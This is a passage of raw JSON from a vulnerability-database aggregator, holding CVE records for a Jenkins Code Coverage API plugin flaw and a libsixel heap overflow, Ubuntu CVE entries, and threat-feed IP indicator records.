[{"hash": "4b729999ecdf9f7badc49deeced1a3fc", "key": "modified"}, {"hash": "90ce7537f09d36c984ae5b024533deb7", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "f37872f70c5adec64d3575247d96ee43", "key": "reporter"}, {"hash": "dfe3b4ec780f3458755fc35dc3801e31", "key": "published"}, {"hash": "66c21d6684dc582ac9b58ababa8a9b69", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "e7d44c0b7d3a8b62878b0a9dfc880d5a", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "e9898a9f74d5b563edc044165046ce22", "key": "cvelist"}, {"hash": "5492033ff27847c95380e9d4212c037f", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "347eb3ab803484ae7d1ee7576b16b8cf", "key": "href"}, {"hash": "279a28d6ecf163197fe378ed05f6ef0d", "key": "title"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21677", "id": "CVE-2021-21677", "immutableFields": [], "lastseen": "2021-09-01T09:55:25", "modified": "2021-08-31T18:15:00", "objectVersion": "1.6", "published": "2021-08-31T14:15:00", "references": ["https://www.jenkins.io/security/advisory/2021-08-31/#SECURITY-2376", "http://www.openwall.com/lists/oss-security/2021/08/31/1"], "reporter": "jenkinsci-cert@googlegroups.com", "title": "CVE-2021-21677", "type": "cve", "viewCount": 4}, "different_elements": ["extraReferences", "cpe23", "cvss", "modified", "cpe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-09-01T09:55:25"}], "edition": 2, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "122e17475c925c6e833f0001744f765e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "707fed40c5c7b3cb4df3c3351c4f9984"}, {"key": "cpe23", "hash": "ccacacfd2477bf32b8476e156a263ea7"}, {"key": "cpeConfiguration", "hash": "54d7a33d175ec6d229eac44305db2417"}, {"key": "cvelist", "hash": "e9898a9f74d5b563edc044165046ce22"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "e7d44c0b7d3a8b62878b0a9dfc880d5a"}, {"key": "description", "hash": "66c21d6684dc582ac9b58ababa8a9b69"}, {"key": "extraReferences", "hash": "643ddf5bb92da7d0417e65396b69b43a"}, {"key": "href", "hash": "347eb3ab803484ae7d1ee7576b16b8cf"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "1e8f9d8a73ce029042bd43752057104d"}, {"key": "published", "hash": "dfe3b4ec780f3458755fc35dc3801e31"}, {"key": "references", "hash": "5492033ff27847c95380e9d4212c037f"}, {"key": "reporter", "hash": "f37872f70c5adec64d3575247d96ee43"}, {"key": "title", "hash": "279a28d6ecf163197fe378ed05f6ef0d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "4ff8fe5d9329bf843e68c8d0b7402d928f9da1ca626fe041523087db934d6781", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["CLOUDBEES_SECURITY_ADVISORY_2021-08-31.NASL"]}], "modified": "2021-09-09T07:25:47", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-09T07:25:47", "rev": 2}}, "objectVersion": "1.6", "cpe": ["cpe:/a:jenkins:code_coverage_api:1.4.0"], "affectedSoftware": [{"cpeName": "jenkins:code_coverage_api", "name": "jenkins code coverage api", "operator": "le", "version": "1.4.0"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:jenkins:code_coverage_api:1.4.0:*:*:*:*:jenkins:*:*", "cpe_name": [], "versionEndIncluding": "1.4.0", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "[oss-security] 20210831 Multiple vulnerabilities in Jenkins plugins", "refsource": "MLIST", "tags": ["Third Party Advisory", "Mailing List"], "url": "http://www.openwall.com/lists/oss-security/2021/08/31/1"}, {"name": "https://www.jenkins.io/security/advisory/2021-08-31/#SECURITY-2376", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://www.jenkins.io/security/advisory/2021-08-31/#SECURITY-2376"}], "cpe23": ["cpe:2.3:a:jenkins:code_coverage_api:1.4.0:*:*:*:*:jenkins:*:*"], "cwe": ["CWE-502"], "scheme": null}, {"id": "CVE-2020-21677", "bulletinFamily": "NVD", "title": "CVE-2020-21677", "description": "A heap-based buffer overflow in the sixel_encoder_output_without_macro function in encoder.c of Libsixel 1.8.4 allows attackers to cause a denial of service (DOS) via converting a crafted PNG file into Sixel format.", "published": "2021-08-10T21:15:00", "modified": "2021-08-17T16:30:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-21677", "reporter": "cve@mitre.org", "references": ["https://github.com/saitoha/libsixel/issues/123"], "cvelist": ["CVE-2020-21677"], "immutableFields": [], "type": "cve", "lastseen": "2021-08-18T08:55:55", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2020-21677"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "A heap-based buffer overflow in the sixel_encoder_output_without_macro function in encoder.c of Libsixel 1.8.4 allows attackers to cause a denial of service (DOS) via converting a crafted PNG file into Sixel format.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-08-11T08:55:46", "references": [{"idList": ["UB:CVE-2020-21677"], "type": "ubuntucve"}], "rev": 2}, "score": {"modified": "2021-08-11T08:55:46", "rev": 2, "value": 4.9, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/saitoha/libsixel/issues/123", "refsource": "MISC", "tags": [], "url": "https://github.com/saitoha/libsixel/issues/123"}], "hash": "6f80161420f9e4c4900812e4a707b0ed1ce789bd966051d329d1d1469003a6f7", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "68030dec9062d8460b563f535492492a", "key": "cvelist"}, {"hash": "58285e1f2950a6681b48d637cd80fab2", "key": "modified"}, {"hash": "e1986730549e4b200f97feaf51f813fc", "key": "extraReferences"}, {"hash": "bbb86dd94d089448a618357c85718789", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "db8e2495ea1e01954b244080849b68a2", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "05c361d3b85945ca6b4e5523e5ab526b", "key": "title"}, {"hash": "8f99bf13b4420e4c63a6bd5cf6c1a620", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "4bf2f6e33bd7be9ecda2e66020784417", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-21677", "id": "CVE-2020-21677", "immutableFields": [], "lastseen": "2021-08-11T08:55:46", "modified": "2021-08-10T22:31:00", "objectVersion": "1.6", "published": "2021-08-10T21:15:00", "references": ["https://github.com/saitoha/libsixel/issues/123"], "reporter": "cve@mitre.org", "title": "CVE-2020-21677", "type": "cve", "viewCount": 2}, "different_elements": ["extraReferences", "cpe23", "cvss", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-08-11T08:55:46"}], "edition": 2, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "96c96b72cec34f0517d28c6a43723369"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "bf066d27f46d5590fadee45c99e9f547"}, {"key": "cpe23", "hash": "333f71fa7a12f3eb7256abda0ae1cce0"}, {"key": "cpeConfiguration", "hash": "62c6773b5dbd42a7a60bf4ffb9e34ed4"}, {"key": "cvelist", "hash": "68030dec9062d8460b563f535492492a"}, {"key": "cvss", "hash": "741b18e744e3f37108cd8c3f4a1c6ef7"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "661a69d232e07fc7aadb258325e71df8"}, {"key": "description", "hash": "8f99bf13b4420e4c63a6bd5cf6c1a620"}, {"key": "extraReferences", "hash": "46253db21f06d5f5855d7d8cc5e7ac65"}, {"key": "href", "hash": "db8e2495ea1e01954b244080849b68a2"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "4130e6df77da931893348adb7ecbbfe1"}, {"key": "published", "hash": "4bf2f6e33bd7be9ecda2e66020784417"}, {"key": "references", "hash": "bbb86dd94d089448a618357c85718789"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "05c361d3b85945ca6b4e5523e5ab526b"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c05369f5219e34b051cb1260a4eea6d74fbb77d5e87b2f8c587794bb33fdad16", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2020-21677"]}], "modified": "2021-08-18T08:55:55", "rev": 2}, "score": {"value": 4.9, "vector": "NONE", "modified": "2021-08-18T08:55:55", "rev": 2}}, "objectVersion": "1.6", "cpe": ["cpe:/a:libsixel_project:libsixel:1.8.4"], "affectedSoftware": [{"cpeName": "libsixel_project:libsixel", "name": "libsixel project libsixel", "operator": "eq", "version": "1.8.4"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:libsixel_project:libsixel:1.8.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/saitoha/libsixel/issues/123", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory", "Exploit", "Issue Tracking"], "url": "https://github.com/saitoha/libsixel/issues/123"}], "cpe23": ["cpe:2.3:a:libsixel_project:libsixel:1.8.4:*:*:*:*:*:*:*"], "cwe": ["CWE-787"], "scheme": null}], "ubuntucve": [{"id": "UB:CVE-2020-21677", "hash": "f4f40f4f1caa35b369251af638cb20a3", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2020-21677", "description": "A heap-based buffer overflow in the sixel_encoder_output_without_macro\nfunction in encoder.c of Libsixel 1.8.4 allows attackers to cause a denial\nof service (DOS) via converting a crafted PNG file into Sixel format.", "published": "2021-08-10T00:00:00", "modified": "2021-08-10T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2020-21677", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21677", "https://github.com/saitoha/libsixel/issues/123", "https://nvd.nist.gov/vuln/detail/CVE-2020-21677", "https://launchpad.net/bugs/cve/CVE-2020-21677", "https://security-tracker.debian.org/tracker/CVE-2020-21677"], "cvelist": ["CVE-2020-21677"], "immutableFields": [], "lastseen": "2021-08-18T21:21:26", "history": [{"bulletin": {"id": "UB:CVE-2020-21677", "hash": "a064deb14fc30f029208e881e2aff032", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2020-21677", "description": "A heap-based buffer overflow in the sixel_encoder_output_without_macro\nfunction in encoder.c of Libsixel 1.8.4 allows attackers to cause a denial\nof service (DOS) via converting a crafted PNG file into Sixel format.", "published": "2021-08-10T00:00:00", "modified": "2021-08-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2020-21677", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21677", "https://github.com/saitoha/libsixel/issues/123", "https://nvd.nist.gov/vuln/detail/CVE-2020-21677", "https://launchpad.net/bugs/cve/CVE-2020-21677", "https://security-tracker.debian.org/tracker/CVE-2020-21677"], "cvelist": ["CVE-2020-21677"], "immutableFields": [], "lastseen": "2021-08-11T21:19:06", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-21677"]}], "modified": "2021-08-11T21:19:06", "rev": 2}, "score": {"value": 3.3, "vector": "NONE", "modified": "2021-08-11T21:19:06", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "libsixel"}, {"OS": "ubuntu", "OSVersion": "21.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "libsixel"}, {"OS": "ubuntu", "OSVersion": "20.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "libsixel"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "libsixel"}], "bugs": []}, "lastseen": "2021-08-11T21:19:06", "differentElements": ["cvss"], "edition": 1}], "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-21677"]}], "modified": "2021-08-18T21:21:26", "rev": 2}, "score": {"value": 3.3, "vector": "NONE", "modified": "2021-08-18T21:21:26", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "libsixel"}, {"OS": "ubuntu", "OSVersion": "21.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "libsixel"}, {"OS": "ubuntu", "OSVersion": "20.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "libsixel"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "libsixel"}], "bugs": [], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}], "rst": [{"id": "RST:4F16CA1A-DCE0-38CE-91A3-3DDBC03B688A", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.14.254", "description": "Found **5[.]157.14.254** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.13.0, Last IP 5.157.14.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"Dublin\", Country \"Ireland\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-05T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4f114cc65a539ea078c4233e2f49521b"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "35c178a48140dad06b5dbce218bb2678"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "72e2a78e9f53867dd1d5ae37849361c7"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "1a5ed22e9eda18c0fe03f965c3fbb735"}, {"key": "modified", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "a519abe0c322b0e81ffe63ff92a91858"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "11609b855fd2c857ec2f1173138deb016341441d4885de18410bd77be6013b95", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.14.254"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Dublin", "country": "Ireland", "region": "Leinster"}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.13.0", "num": "94178560"}, "isp": "AS41564", "lastip": {"netv4": "5.157.14.255", "num": "94179071"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:353DE966-C9DC-3890-B66C-C22199B708D9", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.14.233", "description": "Found **5[.]157.14.233** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.13.0, Last IP 5.157.14.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"Dublin\", Country \"Ireland\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-05T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4f114cc65a539ea078c4233e2f49521b"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "3787d59eb76200f48fd9aca1155806af"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "72e2a78e9f53867dd1d5ae37849361c7"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "8a1c068a393a5341e3e83d12d4aa42cd"}, {"key": "modified", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "0dde15fa10853363c0426db7a8c15672"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "82b01f4f4fe68a54000f31e2b0e1ecbbb92a37cc9cca02018973f34af27bd482", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.14.233"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Dublin", "country": "Ireland", "region": "Leinster"}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.13.0", "num": "94178560"}, "isp": "AS41564", "lastip": {"netv4": "5.157.14.255", "num": "94179071"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:4D3415F7-08C7-3351-890C-481E3B7A7792", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.17.12", "description": "Found **5[.]157.17.12** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.17.0, Last IP 5.157.17.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-05T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4ce3cd3bf144af5ba983303293416789"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "468a02e3867a1959b3a5ff5acd3121b9"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "98c990c0d6a222d78359a926bb2f6a5f"}, {"key": "modified", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "e8133a68bda8e4566fceac6128f1dfbb"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "e196a5ad8adcc77b6ac5a6d5478c88a27253f9a9387e70522fdb82c14a89ec4e", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.17.12"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.17.0", "num": "94179584"}, "isp": "AS41564", "lastip": {"netv4": "5.157.17.255", "num": "94179839"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:33F9E9AC-DC40-3699-BB05-B6EB5AB74379", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.17.17", "description": "Found **5[.]157.17.17** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2020-07-01T03:00:00, Last seen: 2020-07-01T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.17.0, Last IP 5.157.17.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2020-07-01T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-07-01T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4ce3cd3bf144af5ba983303293416789"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "51ceb830ef9d6c497f4825ce7ad536a8"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "6639a74206488251a52d006d2b4b0d48"}, {"key": "modified", "hash": "250c0db3350aca16f346c64d5d43f1bf"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "f000f33a072a4c6f7f741d6146a15803"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "6cdea816893ac93fd725080692405a5d1f6e4b044a260527ab365369778e9167", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.17.17"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.17.0", "num": "94179584"}, "isp": "AS41564", "lastip": {"netv4": "5.157.17.255", "num": "94179839"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:28F96272-9883-317C-8CBB-377A7896D323", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.17.22", "description": "Found **5[.]157.17.22** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **27**.\n First seen: 2020-07-01T03:00:00, Last seen: 2020-07-31T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.17.0, Last IP 5.157.17.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2020-07-01T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-07-31T00:00:00", 